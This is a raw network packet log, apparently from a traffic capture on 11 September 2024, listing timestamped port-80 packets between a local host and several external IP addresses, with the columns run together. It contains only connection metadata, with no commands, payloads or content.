                                                      Sep 11, 2024 11:18:29.409039021 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.409050941 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.409060955 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.409071922 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.409082890 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.409095049 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.409105062 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.409116030 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.409126997 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.409337044 CEST6333280192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:29.409337044 CEST6333280192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:29.409928083 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.409970999 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.410008907 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.410044909 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.410093069 CEST6333280192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:29.410394907 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.410427094 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.410537004 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.411493063 CEST6333280192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:29.415642023 CEST6333280192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:29.420653105 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:35.195337057 CEST6333380192.168.2.4147.92.40.175
                                                      Sep 11, 2024 11:18:35.200243950 CEST8063333147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:35.200308084 CEST6333380192.168.2.4147.92.40.175
                                                      Sep 11, 2024 11:18:35.220805883 CEST6333380192.168.2.4147.92.40.175
                                                      Sep 11, 2024 11:18:35.225575924 CEST8063333147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:36.080634117 CEST8063333147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:36.080869913 CEST8063333147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:36.081007004 CEST6333380192.168.2.4147.92.40.175
                                                      Sep 11, 2024 11:18:36.731383085 CEST6333380192.168.2.4147.92.40.175
                                                      Sep 11, 2024 11:18:37.749614000 CEST6333480192.168.2.4147.92.40.175
                                                      Sep 11, 2024 11:18:37.754650116 CEST8063334147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:37.754781961 CEST6333480192.168.2.4147.92.40.175
                                                      Sep 11, 2024 11:18:37.765835047 CEST6333480192.168.2.4147.92.40.175
                                                      Sep 11, 2024 11:18:37.770768881 CEST8063334147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:38.649354935 CEST8063334147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:38.649413109 CEST8063334147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:38.649480104 CEST6333480192.168.2.4147.92.40.175
                                                      Sep 11, 2024 11:18:39.278251886 CEST6333480192.168.2.4147.92.40.175
                                                      Sep 11, 2024 11:18:40.299506903 CEST6333580192.168.2.4147.92.40.175
                                                      Sep 11, 2024 11:18:40.304550886 CEST8063335147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:40.309700012 CEST6333580192.168.2.4147.92.40.175
                                                      Sep 11, 2024 11:18:40.318083048 CEST6333580192.168.2.4147.92.40.175
                                                      Sep 11, 2024 11:18:40.343519926 CEST6333580192.168.2.4147.92.40.175
                                                      Sep 11, 2024 11:18:40.541412115 CEST8063335147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:40.542474031 CEST8063335147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:40.542608976 CEST8063335147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:40.542845011 CEST8063335147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:40.542932034 CEST8063335147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:40.542982101 CEST8063335147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:40.543036938 CEST8063335147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:40.543065071 CEST8063335147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:40.543098927 CEST8063335147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:40.543128014 CEST8063335147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:41.205226898 CEST8063335147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:41.246866941 CEST6333580192.168.2.4147.92.40.175
                                                      Sep 11, 2024 11:18:41.432682991 CEST8063335147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:41.435628891 CEST6333580192.168.2.4147.92.40.175
                                                      Sep 11, 2024 11:18:41.825227976 CEST6333580192.168.2.4147.92.40.175
                                                      Sep 11, 2024 11:18:42.844113111 CEST6333680192.168.2.4147.92.40.175
                                                      Sep 11, 2024 11:18:42.849703074 CEST8063336147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:42.850100994 CEST6333680192.168.2.4147.92.40.175
                                                      Sep 11, 2024 11:18:42.857403994 CEST6333680192.168.2.4147.92.40.175
                                                      Sep 11, 2024 11:18:42.862719059 CEST8063336147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:43.805891991 CEST8063336147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:43.805990934 CEST8063336147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:43.806004047 CEST8063336147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:43.806174040 CEST6333680192.168.2.4147.92.40.175
                                                      Sep 11, 2024 11:18:43.808532000 CEST6333680192.168.2.4147.92.40.175
                                                      Sep 11, 2024 11:18:43.813530922 CEST8063336147.92.40.175192.168.2.4
                                                      Sep 11, 2024 11:18:48.833849907 CEST6333780192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:48.838921070 CEST80633373.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:48.838988066 CEST6333780192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:48.849874020 CEST6333780192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:48.855218887 CEST80633373.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:49.314177990 CEST80633373.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:49.314259052 CEST6333780192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:50.356323004 CEST6333780192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:50.361268997 CEST80633373.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:51.374890089 CEST6333880192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:51.381279945 CEST80633383.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:51.381354094 CEST6333880192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:51.389895916 CEST6333880192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:51.396301031 CEST80633383.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:51.856936932 CEST80633383.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:51.857059956 CEST6333880192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:52.903409958 CEST6333880192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:52.908235073 CEST80633383.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:53.921533108 CEST6333980192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:53.926501989 CEST80633393.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:53.926601887 CEST6333980192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:53.935519934 CEST6333980192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:53.940459013 CEST80633393.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:53.940469027 CEST80633393.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:53.940511942 CEST80633393.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:53.940522909 CEST80633393.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:53.940583944 CEST80633393.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:53.940596104 CEST80633393.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:53.940632105 CEST80633393.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:53.940642118 CEST80633393.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:53.940651894 CEST80633393.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:54.378367901 CEST80633393.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:54.378505945 CEST6333980192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:55.450050116 CEST6333980192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:55.454968929 CEST80633393.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:56.468858957 CEST6334080192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:56.473845959 CEST80633403.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:56.473989964 CEST6334080192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:56.482244968 CEST6334080192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:56.487191916 CEST80633403.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:56.954099894 CEST80633403.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:56.954148054 CEST80633403.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:56.954241991 CEST6334080192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:56.957153082 CEST6334080192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:56.965621948 CEST80633403.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:01.989552021 CEST6334180192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:01.994424105 CEST80633413.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:01.994724989 CEST6334180192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:02.006359100 CEST6334180192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:02.011262894 CEST80633413.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:02.451505899 CEST80633413.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:02.451570988 CEST6334180192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:03.512702942 CEST6334180192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:03.517858028 CEST80633413.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:04.549612999 CEST6334280192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:04.554505110 CEST80633423.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:04.554577112 CEST6334280192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:04.567523956 CEST6334280192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:04.572508097 CEST80633423.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:05.017091990 CEST80633423.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:05.018537998 CEST6334280192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:06.075057983 CEST6334280192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:06.080070019 CEST80633423.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:07.094856977 CEST6334380192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:07.099747896 CEST80633433.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:07.099818945 CEST6334380192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:07.115612030 CEST6334380192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:07.120528936 CEST80633433.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:07.120544910 CEST80633433.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:07.120559931 CEST80633433.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:07.120589018 CEST80633433.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:07.120601892 CEST80633433.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:07.120614052 CEST80633433.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:07.120629072 CEST80633433.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:07.120759010 CEST80633433.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:07.120771885 CEST80633433.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:07.558631897 CEST80633433.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:07.563352108 CEST6334380192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:08.622057915 CEST6334380192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:08.626955986 CEST80633433.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:09.642535925 CEST6334480192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:09.647857904 CEST80633443.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:09.650141954 CEST6334480192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:09.657597065 CEST6334480192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:09.668180943 CEST80633443.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:10.107368946 CEST80633443.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:10.107448101 CEST80633443.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:10.107614040 CEST6334480192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:10.110318899 CEST6334480192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:10.115205050 CEST80633443.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:15.158047915 CEST6334580192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:15.162954092 CEST80633453.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:15.163022995 CEST6334580192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:15.172907114 CEST6334580192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:15.177963018 CEST80633453.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:15.620940924 CEST80633453.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:15.625648975 CEST6334580192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:16.684535980 CEST6334580192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:16.689464092 CEST80633453.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:17.703748941 CEST6334680192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:17.708786011 CEST80633463.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:17.711657047 CEST6334680192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:17.723570108 CEST6334680192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:17.728487968 CEST80633463.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:18.187302113 CEST80633463.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:18.187778950 CEST6334680192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:19.231492996 CEST6334680192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:19.236449957 CEST80633463.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:20.251570940 CEST6334780192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:20.257256985 CEST80633473.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:20.262643099 CEST6334780192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:20.268410921 CEST6334780192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:20.273641109 CEST80633473.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:20.273653984 CEST80633473.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:20.273667097 CEST80633473.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:20.273679972 CEST80633473.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:20.273693085 CEST80633473.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:20.273705006 CEST80633473.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:20.273718119 CEST80633473.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:20.273730993 CEST80633473.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:20.273744106 CEST80633473.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:20.725886106 CEST80633473.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:20.725939035 CEST6334780192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:21.778806925 CEST6334780192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:21.783906937 CEST80633473.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:22.800738096 CEST6334880192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:22.805958986 CEST80633483.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:22.806035042 CEST6334880192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:22.816143036 CEST6334880192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:22.821871042 CEST80633483.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:23.490638018 CEST80633483.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:23.490678072 CEST80633483.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:23.490830898 CEST80633483.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:23.495579958 CEST6334880192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:23.495579958 CEST6334880192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:19:23.501063108 CEST80633483.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:19:28.721581936 CEST6334980192.168.2.485.153.138.113
                                                      Sep 11, 2024 11:19:28.728296041 CEST806334985.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:28.728358030 CEST6334980192.168.2.485.153.138.113
                                                      Sep 11, 2024 11:19:28.740500927 CEST6334980192.168.2.485.153.138.113
                                                      Sep 11, 2024 11:19:28.745517015 CEST806334985.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:29.857608080 CEST806334985.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:29.857626915 CEST806334985.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:29.857639074 CEST806334985.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:29.857651949 CEST806334985.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:29.857743979 CEST6334980192.168.2.485.153.138.113
                                                      Sep 11, 2024 11:19:29.857779026 CEST806334985.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:29.857955933 CEST6334980192.168.2.485.153.138.113
                                                      Sep 11, 2024 11:19:29.859771013 CEST6334980192.168.2.485.153.138.113
                                                      Sep 11, 2024 11:19:30.247617006 CEST6334980192.168.2.485.153.138.113
                                                      Sep 11, 2024 11:19:31.271599054 CEST6335080192.168.2.485.153.138.113
                                                      Sep 11, 2024 11:19:31.276499987 CEST806335085.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:31.276580095 CEST6335080192.168.2.485.153.138.113
                                                      Sep 11, 2024 11:19:31.292432070 CEST6335080192.168.2.485.153.138.113
                                                      Sep 11, 2024 11:19:31.297497988 CEST806335085.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:31.999973059 CEST806335085.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:32.000555038 CEST806335085.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:32.000569105 CEST806335085.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:32.000619888 CEST6335080192.168.2.485.153.138.113
                                                      Sep 11, 2024 11:19:32.001722097 CEST6335080192.168.2.485.153.138.113
                                                      Sep 11, 2024 11:19:32.793894053 CEST6335080192.168.2.485.153.138.113
                                                      Sep 11, 2024 11:19:33.812474966 CEST6335180192.168.2.485.153.138.113
                                                      Sep 11, 2024 11:19:33.817985058 CEST806335185.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:33.822303057 CEST6335180192.168.2.485.153.138.113
                                                      Sep 11, 2024 11:19:33.837366104 CEST6335180192.168.2.485.153.138.113
                                                      Sep 11, 2024 11:19:33.842283010 CEST806335185.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:33.842355013 CEST806335185.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:33.842370033 CEST806335185.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:33.842382908 CEST806335185.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:33.842447042 CEST806335185.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:33.842534065 CEST806335185.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:33.842546940 CEST806335185.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:33.842559099 CEST806335185.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:33.842573881 CEST806335185.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:34.680179119 CEST806335185.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:34.680330038 CEST806335185.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:34.680404902 CEST6335180192.168.2.485.153.138.113
                                                      Sep 11, 2024 11:19:34.680663109 CEST806335185.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:34.680721045 CEST6335180192.168.2.485.153.138.113
                                                      Sep 11, 2024 11:19:35.340889931 CEST6335180192.168.2.485.153.138.113
                                                      Sep 11, 2024 11:19:36.358936071 CEST6335280192.168.2.485.153.138.113
                                                      Sep 11, 2024 11:19:36.368130922 CEST806335285.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:36.371682882 CEST6335280192.168.2.485.153.138.113
                                                      Sep 11, 2024 11:19:36.377923965 CEST6335280192.168.2.485.153.138.113
                                                      Sep 11, 2024 11:19:36.385498047 CEST806335285.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:37.159225941 CEST806335285.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:37.159240007 CEST806335285.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:37.159251928 CEST806335285.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:37.159360886 CEST6335280192.168.2.485.153.138.113
                                                      Sep 11, 2024 11:19:37.162448883 CEST6335280192.168.2.485.153.138.113
                                                      Sep 11, 2024 11:19:37.170542955 CEST806335285.153.138.113192.168.2.4
                                                      Sep 11, 2024 11:19:42.308295012 CEST6335380192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:42.313394070 CEST8063353104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:42.314088106 CEST6335380192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:42.325709105 CEST6335380192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:42.332947969 CEST8063353104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:43.317822933 CEST8063353104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:43.318542004 CEST8063353104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:43.318591118 CEST6335380192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:43.825623035 CEST6335380192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:44.844741106 CEST6335480192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:44.849625111 CEST8063354104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:44.849690914 CEST6335480192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:44.862307072 CEST6335480192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:44.867193937 CEST8063354104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:45.850116968 CEST8063354104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:45.850399971 CEST8063354104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:45.853996992 CEST6335480192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:46.375442982 CEST6335480192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:47.390487909 CEST6335580192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:47.395417929 CEST8063355104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:47.395486116 CEST6335580192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:47.407268047 CEST6335580192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:47.412132025 CEST8063355104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:47.412370920 CEST8063355104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:47.412385941 CEST8063355104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:47.412447929 CEST8063355104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:47.412461042 CEST8063355104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:47.412466049 CEST8063355104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:47.412607908 CEST8063355104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:47.412630081 CEST8063355104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:47.412643909 CEST8063355104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:48.377228975 CEST8063355104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:48.378093004 CEST8063355104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:48.378230095 CEST6335580192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:48.918927908 CEST6335580192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:49.941896915 CEST6335680192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:49.946899891 CEST8063356104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:49.947125912 CEST6335680192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:49.953535080 CEST6335680192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:49.958538055 CEST8063356104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:50.920229912 CEST8063356104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:50.920298100 CEST8063356104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:50.920420885 CEST6335680192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:50.922954082 CEST6335680192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:50.927655935 CEST8063356104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:55.965629101 CEST6335780192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:19:55.976468086 CEST8063357188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:19:55.976743937 CEST6335780192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:19:55.986718893 CEST6335780192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:19:55.993038893 CEST8063357188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:19:56.435580969 CEST8063357188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:19:56.435595036 CEST8063357188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:19:56.435700893 CEST6335780192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:19:57.497056961 CEST6335780192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:19:58.515767097 CEST6335880192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:19:58.521693945 CEST8063358188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:19:58.527710915 CEST6335880192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:19:58.536246061 CEST6335880192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:19:58.541738033 CEST8063358188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:19:58.981581926 CEST8063358188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:19:58.981991053 CEST8063358188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:19:58.982043028 CEST6335880192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:20:00.047655106 CEST6335880192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:20:01.063056946 CEST6335980192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:20:01.067986012 CEST8063359188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:01.068058014 CEST6335980192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:20:01.082154036 CEST6335980192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:20:01.087598085 CEST8063359188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:01.087609053 CEST8063359188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:01.087616920 CEST8063359188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:01.087620974 CEST8063359188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:01.087629080 CEST8063359188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:01.087639093 CEST8063359188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:01.087649107 CEST8063359188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:01.087657928 CEST8063359188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:01.087738037 CEST8063359188.114.97.3192.168.2.4
